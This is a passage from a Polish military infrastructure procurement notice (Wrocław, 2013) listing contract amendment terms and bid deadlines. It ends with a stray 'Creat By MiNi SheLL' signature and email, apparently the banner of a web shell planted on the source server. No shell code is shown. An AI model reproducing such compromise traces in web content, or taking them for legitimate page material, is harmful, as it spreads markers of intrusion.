i) konieczności wykonania robót dodatkowych, mających wpływ na zmianę
terminu wykonania umowy.
2. Wynagrodzenia Wykonawcy w przypadku:
a) zmniejszenia lub zwiększenia ilości jednostek obmiarowych - w zakresie
mającym wpływ na ustaloną kwotę wynagrodzenia;
b) obiektywnie uzasadnionej konieczności wprowadzenia zmiany technologii
wykonania przedmiotu umowy; zmiana zakresu prac określonych w SIWZ jest
możliwa tylko w zakresie niezbędnym do zgodnego a obowiązującymi
standardami, wymaganiami technicznymi oraz normami prawidłowego
wykonania przedmiotu umowy lub ze względu na interes Zamawiającego
wynikający z możliwości obniżenia kosztów robót lub skrócenia terminu
realizacji robót.
c) wystąpienia robót dodatkowych;
d) zmiany powszechnie obowiązujących przepisów prawa w szczególności
przepisów prawa podatkowego;
3. Zmiany kierownika budowy, pod warunkiem, że nowa osoba będzie spełniać wymagania określone w SIWZ dla danej funkcji.
4. Zmiany zakresu robót realizowanych przez podwykonawcę, wskazanych
w Formularzu nr, lub powierzenia części zamówienia podwykonawcy mimo braku
takiego wskazania w Formularzu nr, z przyczyn obiektywnie uzasadnionych.
5. Wprowadzenia rozwiązań (robót) zamiennych w stosunku do rozwiązań przewidzianych w projekcie. Wprowadzenie rozwiązań (robót) zamiennych może mieć również wpływ na zmianę terminu realizacji zadania i wynagrodzenia Wykonawcy.
6. Wszelkie zmiany do niniejszej umowy wymagają pod rygorem nieważności zachowania formy pisemnej poprzez spisanie aneksu.
7. Wykonawca zobowiązuje się do informowania Zamawiającego o zmianie formy
prowadzonej działalności oraz zmianie adresu siedziby firmy i zamieszkania jej
właściciela, pod rygorem uznania korespondencji kierowanej na ostatni podany przez
Wykonawcę adres za doręczony. Powyższe zobowiązanie dotyczy okresu obowiązywania umowy, rękojmi gwarancji oraz nie zakończonych rozliczeń wynikających z umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rziwroclaw.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Rejonowy Zarząd Infrastruktury, ul. Obornicka 126, 50-984 Wrocław- pok. 29.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.03.2013 godzina 10:00, miejsce: Rejonowy Zarząd Infrastruktury, ul. Obornicka 126, 50-984 Wrocław- kancelaria pok. 101.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com